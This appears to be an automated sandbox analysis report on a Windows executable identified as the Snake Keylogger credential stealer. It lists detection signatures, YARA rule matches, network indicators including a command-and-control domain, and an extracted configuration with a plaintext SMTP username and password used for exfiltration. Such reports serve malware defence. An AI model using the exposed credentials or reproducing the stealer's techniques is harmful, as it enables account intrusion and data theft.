Windows Analysis Report
e-dekont.exe

Overview

General Information

Sample name: e-dekont.exe
Analysis ID: 1430774
MD5: ff53d6a04ea8618890f7a81e31bd8a22
SHA1: d804959bcb8a2ea43278a1f78aac8abede4fa62f
SHA256: 5f8e6d5fd79a5a648e42597881ddf5e418be34a81b678b9742fad39d6b74c298
Tags: exe, geo, TUR

Detection

Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • e-dekont.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\e-dekont.exe" MD5: FF53D6A04EA8618890F7A81E31BD8A22)
    • e-dekont.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\e-dekont.exe" MD5: FF53D6A04EA8618890F7A81E31BD8A22)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}
Source | Rule | Description | Author | Strings
00000002.00000002.4088425866.0000000003160000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x147ab:$a1: get_encryptedPassword
  • 0x14aa1:$a2: get_encryptedUsername
  • 0x145b7:$a3: get_timePasswordChanged
  • 0x146b2:$a4: get_passwordField
  • 0x147c1:$a5: set_encryptedPassword
  • 0x15da8:$a7: get_logins
  • 0x15d0b:$a10: KeyLoggerEventArgs
  • 0x159a4:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
  • 0x18184:$x1: $%SMTPDV$
  • 0x181e8:$x2: $#TheHashHere%&
  • 0x1983b:$x3: %FTPDV$
  • 0x1992f:$x4: $%TelegramDv$
  • 0x159a4:$x5: KeyLoggerEventArgs
  • 0x15d0b:$x5: KeyLoggerEventArgs
  • 0x1985f:$m2: Clipboard Logs ID
  • 0x19a2b:$m2: Screenshot Logs ID
  • 0x19af7:$m2: keystroke Logs ID
  • 0x19a03:$m4: \SnakeKeylogger\

Source | Rule | Description | Author | Strings
0.2.e-dekont.exe.4720090.8.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.e-dekont.exe.4720090.8.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0.2.e-dekont.exe.4720090.8.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x12bab:$a1: get_encryptedPassword
  • 0x12ea1:$a2: get_encryptedUsername
  • 0x129b7:$a3: get_timePasswordChanged
  • 0x12ab2:$a4: get_passwordField
  • 0x12bc1:$a5: set_encryptedPassword
  • 0x141a8:$a7: get_logins
  • 0x1410b:$a10: KeyLoggerEventArgs
  • 0x13da4:$a11: KeyLoggerEventArgsEventHandler
0.2.e-dekont.exe.4720090.8.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x1a53f:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x19771:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x19ba4:$a4: \Orbitum\User Data\Default\Login Data
  • 0x1abe3:$a5: \Kometa\User Data\Default\Login Data
0.2.e-dekont.exe.4720090.8.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
  • 0x1375d:$s1: UnHook
  • 0x13764:$s2: SetHook
  • 0x1376c:$s3: CallNextHook
  • 0x13779:$s4: _hook
            No Sigma rule has matched
            No Snort rule has matched


            AV Detection

            Source: https://scratchdreams.tk | Avira URL Cloud: Label: malware
            Source: https://scratchdreams.tk/_send_.php?TS | Avira URL Cloud: Label: malware
            Source: http://scratchdreams.tk | Avira URL Cloud: Label: malware
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "s.reyhani@agmfilter.com", "Password": "sibelr_63017", "Host": "mail.agmfilter.com", "Port": "587"}
            Source: scratchdreams.tk | Virustotal: Detection: 17%
            Source: https://scratchdreams.tk | Virustotal: Detection: 16%
            Source: https://scratchdreams.tk/_send_.php?TS | Virustotal: Detection: 14%
            Source: http://scratchdreams.tk | Virustotal: Detection: 17%
            Source: e-dekont.exe | ReversingLabs: Detection: 60%
            Source: e-dekont.exe | Virustotal: Detection: 61%
            Source: e-dekont.exe | Joe Sandbox ML: detected
            Source: e-dekont.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0
            Source: unknown | HTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: e-dekont.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: wGVE.pdbSHA256S source: e-dekont.exe
            Source: Binary string: wGVE.pdb source: e-dekont.exe

            Networking

            Source: Yara match | File source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPE
            Source: global traffic | HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /xml/154.16.105.36 HTTP/1.1 Host: reallyfreegeoip.org
            Source: global traffic | HTTP traffic detected: GET /_send_.php?TS HTTP/1.1 Host: scratchdreams.tk Connection: Keep-Alive
            Source: Joe Sandbox View | IP Address: 104.21.67.152
            Source: Joe Sandbox View | IP Address: 158.101.44.242
            Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknown | DNS query: name: checkip.dyndns.org
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
            Source: unknown | HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.4:49734 version: TLS 1.0
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | DNS traffic detected: queries for: checkip.dyndns.org
            Source: unknownHTTPS traffic detected: 104.21.27.85:443 -> 192.168.2.4:49750 version: TLS 1.2

            System Summary

            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.e-dekont.exe.2b052b4.1.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
            Source: 0.2.e-dekont.exe.73b0000.12.raw.unpack, HomeView.csLarge array initialization: : array initializer size 33604
            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1666058439.00000000073B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000000.1635678271.000000000078E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewGVE.exeB vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1660508075.0000000002AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1660508075.0000000002C5A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1663643804.0000000004AE0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs e-dekont.exe
            Source: e-dekont.exe, 00000000.00000002.1659851365.0000000000E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont.exe
            Source: e-dekont.exe, 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs e-dekont.exe
            Source: e-dekont.exe, 00000002.00000002.4086498385.0000000000DD7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs e-dekont.exe
            Source: e-dekont.exeBinary or memory string: OriginalFilenamewGVE.exeB vs e-dekont.exe
            Source: e-dekont.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.4720090.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 2.2.e-dekont.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000002.00000002.4086321706.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1662409618.00000000044BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: e-dekont.exe PID: 7268, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: e-dekont.exe PID: 7424, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: e-dekont.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, ----.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.e-dekont.exe.4720090.8.raw.unpack, -C.cs, Cryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, dTtXywlp86sra2ZdK5.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, dTtXywlp86sra2ZdK5.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, dTtXywlp86sra2ZdK5.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, dTtXywlp86sra2ZdK5.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.4ae0000.11.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: _0020.AddAccessRule
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, dTtXywlp86sra2ZdK5.cs, Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.e-dekont.exe.46bd870.10.raw.unpack, dTtXywlp86sra2ZdK5.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: _0020.SetAccessControl
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.e-dekont.exe.465b050.9.raw.unpack, sZO3HFIRxWuEpruDfq.cs, Security API names: _0020.AddAccessRule
            Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
            Source: C:\Users\user\Desktop\e-dekont.exe, File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e-dekont.exe.log
            Source: C:\Users\user\Desktop\e-dekont.exe, Mutant created: NULL
            Source: e-dekont.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\e-dekont.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: e-dekont.exe, 00000002.00000002.4088425866.0000000003216000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.0000000003207000.00000004.00000800.00020000.00000000.sdmp, e-dekont.exe, 00000002.00000002.4088425866.00000000031F8000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: e-dekont.exe, ReversingLabs: Detection: 60%
            Source: e-dekont.exe, Virustotal: Detection: 61%
            Source: C:\Users\user\Desktop\e-dekont.exe, File read: C:\Users\user\Desktop\e-dekont.exe:Zone.Identifier
            Source: unknown, Process created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"
            Source: C:\Users\user\Desktop\e-dekont.exe, Process created: C:\Users\user\Desktop\e-dekont.exe "C:\Users\user\Desktop\e-dekont.exe"
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\e-dekont.exe, Section loaded: kernel.appcore.dll
